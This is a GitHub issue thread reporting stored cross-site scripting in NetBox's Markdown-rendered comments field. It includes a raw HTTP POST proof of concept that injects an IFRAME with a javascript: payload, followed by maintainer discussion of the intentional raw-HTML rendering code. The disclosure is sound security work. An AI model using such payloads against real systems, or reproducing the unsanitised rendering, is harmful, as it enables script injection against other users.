Netbox: XSS possible through GFM-rendered fields

Created on 31 Aug 2019  路  4Comments  路  Source: netbox-community/netbox

Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]

Environment

  • Python version: 3.7.4
  • NetBox version: 2.6.1 -2.6.2

Parameter:
name="comments" [ works on all pages where the parameter is present ]

PoC

POST /dcim/sites/add/ HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xxx
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 2158
Connection: close
Cookie: csrftoken=xxx; sessionid=xxx
Upgrade-Insecure-Requests: 1

-----------------------------57052814523281
Content-Disposition: form-data; name="csrfmiddlewaretoken"

xxxx

<snipped>

-----------------------------57052814523281
Content-Disposition: form-data; name="comments"
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

-----------------------------57052814523281
Content-Disposition: form-data; name="_create"

-----------------------------57052814523281--

XssGit

a cve will be requested

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

accepted feature
Source
picture CloneAssassin
👀2 👍1

All 4 comments

This is known and expected behavior. There was some discussion a while back (though I can't find a GitHub issue for it) where we decided to allow raw HTML in comment fields. The logic was that since only authenticated users are permitted to post content, the risk would be acceptable for most use cases.

    html = markdown(value, extensions=['mdx_gfm'])
    return mark_safe(html)

I don't have a strong opinion on this either way: We can leave it as-is, or we can disable HTML entirely and leave only GitHub-flavored Markdown (GFM) rendering. What I don't want to do is start maintaining a whitelist/blacklist of HTML tags that should or should not be permitted. That's a lot of overhead and frankly overkill given the type of content intended to be stored in these fields.

jeremystretch picture jeremystretch on 3 Sep 2019

it is not clear to me why html component must be inserted in a comment function. An xss stored can lead to a privilege escalation, therefore the possibility to access administrative functions.

CloneAssassin picture CloneAssassin on 4 Sep 2019
👍1

And yet, other users might need it. I'm not going to remove a piece of functionality from the application without some discussion. Hence the "gathering feedback" tag.

jeremystretch picture jeremystretch on 4 Sep 2019
👍1

What about creating a new permission that allows users to use html or not (only markdown or whatever)?

juan-vg picture juan-vg on 19 Sep 2019
👍1
Was this page helpful?
0 / 5 - 0 ratings

Related issues

benjy44 picture benjy44  路  3Comments
Ali-Yazdani picture Ali-Yazdani  路  3Comments
mrfroggg picture mrfroggg  路  3Comments
markve-sa picture markve-sa  路  4Comments
candlerb picture candlerb  路  3Comments